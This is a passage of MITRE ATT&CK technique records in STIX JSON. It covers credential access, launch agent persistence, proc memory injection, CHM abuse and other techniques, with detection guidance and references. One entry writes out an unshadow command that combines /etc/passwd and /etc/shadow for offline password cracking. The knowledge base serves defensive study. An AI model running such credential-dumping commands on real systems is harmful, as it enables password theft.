"kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Martin McCloskey, Datadog"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cfb525cc-5494-401d-a82b-2539ca46a561", "created": "2023-09-25T12:41:26.501Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1555/006", "external_id": "T1555.006"}, {"source_name": "Sysdig ScarletEel 2.0 2023", "description": "Alessandro Brucato. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved September 25, 2023.", "url": "https://sysdig.com/blog/scarleteel-2-0/"}, {"source_name": "AWS Secrets Manager", "description": "AWS. (n.d.). Retrieve secrets from AWS Secrets Manager. Retrieved September 25, 2023.", "url": "https://docs.aws.amazon.com/secretsmanager/latest/userguide/retrieving-secrets.html"}, {"source_name": "Google Cloud Secrets", "description": "Google Cloud. (n.d.). List secrets and view secret details. Retrieved September 25, 2023.", "url": "https://cloud.google.com/secret-manager/docs/view-secret-details"}, {"source_name": "Permiso Scattered Spider 2023", "description": "Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.", "url": "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud"}, {"source_name": "Microsoft Azure Key Vault", "description": "Microsoft. (2023, January 13). Quickstart: Set and retrieve a secret from Azure Key Vault using Azure CLI. Retrieved September 25, 2023.", "url": "https://learn.microsoft.com/en-us/azure/key-vault/secrets/quick-create-cli"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-05-13T23:51:22.625Z", "name": "Exploitation for Privilege Escalation", "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. (Citation: The MITRE Corporation) \n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. (Citation: The MITRE Corporation)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "ics-privesc"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack", "enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["None"], "x_mitre_version": "1.3", "x_mitre_data_sources": ["Application Log: Application Log Content"], "x_mitre_effective_permissions": [], "x_mitre_permissions_required": [], "x_mitre_system_requirements": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "created": "2021-04-13T12:08:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0890", "external_id": "T0890"}, {"source_name": "The MITRE Corporation", "description": "The MITRE Corporation The MITRE Corporation ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ", "url": "https://attack.mitre.org/techniques/T1068/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-10-18T22:44:01.723Z", "name": "Code Repositories", "description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)\n\n**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Itamar Mizrahi, Cymptom", "Toby Kohlenberg", "Josh Liburdi, @jshlbrd"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["SaaS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cff94884-3b1c-4987-a70b-6d5643c621c3", "created": "2021-05-11T18:51:16.343Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1213/003", "external_id": "T1213.003"}, {"source_name": "Wired Uber Breach", "description": "Andy Greenberg. (2017, January 21). Hack Brief: Uber Paid Off Hackers to Hide a 57-Million User Data Breach. Retrieved May 14, 2021.", "url": "https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/"}, {"source_name": "Krebs Adobe", "description": "Brian Krebs. (2013, October 3). Adobe To Announce Source Code, Customer Data Breach. Retrieved May 17, 2021.", "url": "https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Transmitted Data Manipulation", "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Integrity"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "created": "2020-03-02T14:27:00.693Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1565/002", "external_id": "T1565.002"}, {"source_name": "DOJ Lazarus Sony 2018", "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", "url": "https://www.justice.gov/opa/press-release/file/1092091/download"}, {"source_name": "FireEye APT38 Oct 2018", "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", "url": "https://content.fireeye.com/apt/rpt-apt38"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "/etc/passwd and /etc/shadow", "description": "Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)\n\nThe Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", "created": "2020-02-11T18:46:56.263Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1003/008", "external_id": "T1003.008"}, {"source_name": "Linux Password and Shadow File Formats", "description": "The Linux Documentation Project. (n.d.). Linux Password and Shadow File Formats. Retrieved February 19, 2020.", "url": "https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html"}, {"source_name": "nixCraft - John the Ripper", "description": "Vivek Gite. (2014, September 17). Linux Password Cracking: Explain unshadow and john Commands (John the Ripper Tool). Retrieved February 19, 2020.", "url": "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Launch Agent", "description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Antonio Piazza, @antman1p"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See\u2019s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\n\nEnsure Launch Agent's ProgramArguments key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584", "created": "2020-01-17T16:10:58.592Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1543/001", "external_id": "T1543.001"}, {"source_name": "AppleDocs Launch Agent Daemons", "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"}, {"source_name": "Sofacy Komplex Trojan", "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"}, {"source_name": "OceanLotus for OS X", "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.", "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update"}, {"source_name": "OSX Keydnap malware", "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "OSX Malware Detection", "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf"}, {"source_name": "Antiquated Mac Malware", "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"}, {"source_name": "OSX.Dok Malware", "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "System Services", "description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for command line invocations of tools capable of modifying services that doesn\u2019t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM", "root"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", "created": "2020-03-10T18:23:06.482Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1569", "external_id": "T1569"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-03-01T17:35:02.889Z", "name": "Windows Command Shell", "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", "created": "2020-03-09T14:12:31.196Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/003", "external_id": "T1059.003"}, {"source_name": "SSH in Windows", "description": "Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal. Retrieved July 26, 2021.", "url": "https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Proc Memory", "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", "created": "2020-01-14T01:34:10.588Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/009", "external_id": "T1055.009"}, {"source_name": "Uninformed Needle", "description": "skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.", "url": "http://hick.org/code/skape/papers/needle.txt"}, {"source_name": "GDS Linux Injection", "description": "McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020.", "url": "https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html"}, {"source_name": "DD Man", "description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020.", "url": "http://man7.org/linux/man-pages/man1/dd.1.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Compiled HTML File", "description": "Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nAdversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International"], "x_mitre_detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_defense_bypassed": ["Application whitelisting", "Digital Certificate Validation"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d21a2069-23d5-4043-ad6d-64f6b644cb1a", "created": "2018-10-17T00:14:20.652Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1223", "external_id": "T1223"}, {"source_name": "Microsoft HTML Help May 2018", "description": "Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.", "url": "https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk"}, {"source_name": "Microsoft HTML Help ActiveX", "description": "Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.", "url": "https://msdn.microsoft.com/windows/desktop/ms644670"}, {"source_name": "Microsoft HTML Help Executable Program", "description": "Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved October 3, 2018.", "url": "https://msdn.microsoft.com/windows/desktop/ms524405"}, {"source_name": "MsitPros CHM Aug 2017", "description": "Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM \u2013 CVE-2017-8625. Retrieved October 3, 2018.", "url": "https://msitpros.com/?p=3909"}, {"source_name": "Microsoft CVE-2017-8625 Aug 2017", "description": "Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.", "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-04-14T20:04:42.893Z", "name": "Acquire Access", "description": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)\n\nFootholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a \u201cload\u201d that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)\n\nBy leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)\n\nIn some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).\n\n**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Jeremy Kennelly", "Jeffrey Barto"], "x_mitre_deprecated": false, "x_mitre_detection": "Much of this takes place outside the visibility of the target organization, making detection difficult for defenders. \n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d21bb61f-08ad-4dc1-b001-81ca6cb79954", "created": "2023-03-10T15:37:21.782Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1650", "external_id": "T1650"}, {"source_name": "Krebs Access Brokers Fortune 500", "description": "Brian Krebs. (2012, October 22). Service Sells Access to Fortune 500 Firms. Retrieved March 10, 2023.", "url": "https://krebsonsecurity.com/2012/10/service-sells-access-to-fortune-500-firms/"}, {"source_name": "CrowdStrike Access Brokers", "description": "CrowdStrike Intelligence Team. (2022, February 23). Access Brokers: Who Are the Targets, and What Are They Worth?. Retrieved March 10, 2023.", "url": 